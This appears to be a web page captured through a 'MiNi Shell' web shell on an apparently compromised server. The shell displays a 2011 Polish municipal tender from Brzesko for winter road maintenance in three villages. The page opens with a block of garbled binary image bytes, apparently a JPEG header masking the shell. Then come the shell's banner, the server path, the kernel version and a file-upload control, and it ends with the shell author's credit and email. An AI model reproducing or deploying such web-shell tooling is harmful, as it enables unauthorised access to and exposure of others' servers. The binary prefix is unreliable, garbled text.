JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111018/273155-N-2011.html

<p class="kh_header"><b>Brzesko: Zimowe utrzymanie dróg w Jasieniu, Okocimiu i Porębie Spytkowskiej</b><br>
<b>Numer ogłoszenia: 273155 - 2011; data zamieszczenia: 18.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Brzeska , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie, tel. 0-14 68 63 100, faks 0-14 66 305 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg w Jasieniu, Okocimiu i Porębie Spytkowskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie zimowe dróg gminnych w: Jasieniu , Okocimiu 
i Porębie Spytkowskiej według 4 standardu odśnieżania i usuwania gołoledzi - zgodnie z Załącznikiem Nr 1 do Zarządzenia Nr 46 Ministra Transport i Gospodarki Morskiej z dnia 25.10. 2000 r. ( Dz.U. Nr 10, poz. 20)- którego kserokopia stanowi załącznik Nr 7 SIWZ.
Zakres robót obejmuje :
1. Odśnieżanie pługiem jezdni drogi na całej szerokości, przy warstwie śniegu do 15 cm. 
2. Odśnieżanie pługiem jezdni drogi na całej szerokości, przy warstwie śniegu ponad15 cm.
3. Posypywanie odśnieżonej jezdni drogi materiałem uszorstniającym  przy użyciu rozrzutnika, lub piaskarki. 
4. Odśnieżanie pługiem jezdni drogi z równoczesnym jej posypywaniem materiałem uszorstniającym z piaskarki /rozrzutnika/ umieszczonego na pojeździe. 
Opis Części zamówienia stanowią odpowiednio;
A/ Dla zadania Nr 1 -Załącznik 9A SIWZ - Jasień.
B/ Dla zadania Nr 2 Załącznik Nr 9B SIWZ - Okocim.
C/ Dla zadania Nr 3 ZAŁĄCZNIK Nr 9C SIWZ - Poręba Spytkowska.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67, ust. 1 pkt 6 upzp Zamawiający przewiduje udzielenie wykonawcy usług zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień. W przypadku zwiększonych i  obfitych opadów śniegu i występowania gołoledzi</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferent zapewni jako część swojej oferty wadium w wysokości; 
1000,00 PLN ( słownie : tysiąc złotych 00/100 PLN ) na każde zadanie odrębnie zgodnie z art.45 i art. 46 upzp oraz pkt. 8 SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzane będzie złożone oświadczenie. Ocena polega m.in. na sprawdzeniu;
-czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia,
-czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),
-czy zawiera informacje wymagane dla tego dokumentu, 
-czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, 
-czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk  - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzane będzie złożone oświadczenie. Ocena polega m.in. na sprawdzeniu;
-czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia,
-czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),
-czy zawiera informacje wymagane dla tego dokumentu, 
-czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, 
-czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk  - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzane będzie dysponowanieodpowiednim sprzętem technicznym umożliwiającym sprawną realizację 
zamówienia  minimum: 
- jeden zestaw odśnieżny: tj. piaskarki z pługiem odśnieżnym lub ciągnika (klasy min. C-360) z pługiem odśnieżnym i rozrzutnikiem.
Ocena polega m.in. na sprawdzeniu;
-czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia,
-czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),
-czy zawiera informacje wymagane dla tego dokumentu, 
-czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, 
-czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk  - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzane będzie złożone oświadczenie. Ocena polega m.in. na sprawdzeniu;
-czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia,
-czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),
-czy zawiera informacje wymagane dla tego dokumentu, 
-czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, 
-czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk  - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzane będzie złożone oświadczenie. Ocena polega m.in. na sprawdzeniu;
-czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia,
-czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),
-czy zawiera informacje wymagane dla tego dokumentu, 
-czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, 
-czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk  - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie w trybie art. 22 ustawy Pzp - załącznik Nr 1 SIWZ.
2. Oświadczenie w trybie art. 24 ustawy Pzp - załącznik Nr 2 SIWZ.
3. Oświadczenie uzupełniającego w trybie art. 24ustawy Pzp - załącznik Nr 3 SIWZ.
4. Oświadczenie o akceptacji projektu umowy - załącznik Nr 4 SIWZ.
5. Oświadczenie o dyspozycyjności - załącznik 5 SIWZ.
6. Wypełniony formularz cenowy- załącznik Nr 10 SIWZ.
7.Wykaz części zamówienia, które Wykonawca zamierza powierzyć  podwykonawcom - załącznik Nr 9 SIWZ.
8.Wykaz sprzętu i urządzeń do zimowego utrzymania - Załącznik Nr 12 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust 1 zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy oraz określa poniżej warunki takiej zmiany;
Obniżenie wartości umowy w przypadku odstąpienia od wykonania części usług, które obejmowało zamówienie.
Zmiana wartości umowy w przypadku zmiany  podatku VAT, 
Warunkami takiej zmiany są: 
-	zmiany w podatku VAT wprowadzone właściwymi aktami prawnymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzesko.pl - menu: przetargi/zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, ul. Głowackiego 51, 
32-800 Brzesko, pokój Nr 108, tel. 014/68-63-100, wew.144,
 w dniach pracy Urzędu Miejskiego w godzinach od 7:30 - 15:30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2011 godzina 09:00, miejsce: Urząd Miejski, ul. Głowackiego 51, 
32-800 Brzesko, pokój Nr 101 - Sekretariat Burmistrza Brzeska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sołectwo Jasień.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Z E S T A W I E N I E  D R Ó G

dla potrzeb ich zimowego utrzymania w sezonie zimowym 2011/2012r.
w sołectwie Jasień


1. Jasień-ul.N.Świat-Mazurkiewicza od ul. Pomianowskiej do ul. Marii Konopnickiej                    2.510 
2. Jasień - ul. Wiedeńska od ul. Ks. Mazurkiewicza do końca zabudowań                                        1.940
3. Jasień - ul. Jesionowa od ul. M. Konopnickiej do ul. Wiedeńskiej                                                   150 
4. Jasień - ul. Wiedeńska /łącznik/ od ul. M. Konopnickiej do ul. Wiedeńskiej                                    150
5. Jasień - Dom Dziecka od ul. Ks.Mazurkiewicza do ul. Kasztanowej                                               410
  6. Jasień - ul. Sądecka od ul. Pomianowskiej do dr pow.Brzesko-Bochnia                                       2.110
7. Jasień - ul. Floriańska-Wiśnicka od ul. Sądeckiej do końca zabudowań                                        1.800
8. Jasień - ul. Górna od ul. Floriańskiej do ul. Zielnej                                                                           560
9. Jasień - ul. Zielna od ul. Floriańskiej do ul. Ks. Mazurkiewicza                                                       790 
10.Jasień - ul. Strażacka od Domu Strażaka do ul. Ks. Mazurkiewicza /pętla/                                     370
11.Jasień - ul. Kasztanowa od ul. Ks. Mazurkiewicza do do końca zabudowań                                   790
12.Jasień - ul. Kasprowicza od ul. M. Konopnickiej do granicy z Gm. Rzezawa                              2.360
13.Jasień - ul. Jagodowa od ul. Kasprowicza do końca zabudowań                                                      750
14.Jasień - ul. Torowa od ul. Kasprowicza do przejazdu kolejowego PKP                                          740
15.Jasień - ul. Warszawska-Klonowa od ul. Ks. Mazurkiewicza do obszaru leśnego                        1.530
16.Jasień - ul. Klonowa Boczna od ul. Klonowej do ul. Jodłowskiej w Brzesku                                  600
17.Jasień - ul. Kamionka od ul. Konopnickiej do zabudowań                                                               750

18.Jasień - ul. Wiśniowa od ul. Sądeckiej do zabudowań                                                                     450.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sołectwo Okocim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Z E S T A W I E N I E  D R Ó G

dla potrzeb ich zimowego utrzymania w sezonie zimowym 2011/2012r. 
w sołectwie Okocim

1.  Okocim - ul. Czerwona Droga od ul. Cesarski Gościniec do obszaru leśnego                              3.000
2.Okocim - ul. Ks. Fr. Kazka od ul. Zamkowej do ul. Czerwona Droga                                          1.220
3.Okocim - ul. Stroma od ul. Ks. Kazka do zabudowań Pana Frankowskiego                                   150 
4.Okocim - ul. Pogodna od ul. Stromej na odległość ok. 150 mb                                                       150
5.Okocim - ul. Pod Bocheńcem od ul. Zagrody do zabudowań                                                         170
6.Okocim - Zamkowa od ul. Gotzów Okocimskich do ul.Cesarski Gościniec                                1.200
7.Okocim - Leszczynowa od ul. Gotzów Okocimskich do ul. Kasztanki                                        1.110
8.Okocim - Zagrody od ul. Klęczany do ul. Witosa w Jadownikach                                              2.120 
9.Okocim - Osiedle Kamieniec od ul. Karpackiej do końca zabudowań /do lasu/                          1.400
10.Okocim - Osiedle Zalesie od ul. Czerwona Droga do zabudowań                                               1.340
11.Okocim - ul. Kasztanki od ul. Zagrody do ul. Leszczynowej                                                          140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sołectwo Poręba Spytkowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Z E S T A W I E N I E  D R Ó G

dla potrzeb ich zimowego utrzymania w sezonie zimowym 2011/2012r
 w sołectwie Poręba Spytkowska


1. Poręba - ul. Tęczowa  i ul. Gródek od ulicy Spytka  do gran.z Gm.Wiśnicz                           2. 450
2. Poręba -ul.Bursztynowa  od ul. Tęczowej do końca zabudowań                                             1. 000
3 .Poręba - ul. Bursztynowa od ul. Granicznej do końca zabudowań                                              700
4. Poręba - ul. Jodłowa od pętli autobusowej do końca zabudowań                                                400
5. Poręba - ul. Skalna od ul. Spytka  do ulicy Granicznej                                                            2. 280
6. Poręba - ul. Bystra  od ul. Skalna do  ul. Św. Bartłomieja                                                            900
7. Poręba - ul. Malownicza od ul. Spytka do końca zabudowań                                                      600
8. Poręba - Cmentarz od ulicy Spytka do Cmentarza Parafialnego                                                 490

9. Poręba - ul. Św. Bartłomieja od ulicy Skalnej do ulicy Spytka                                                1. 660.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com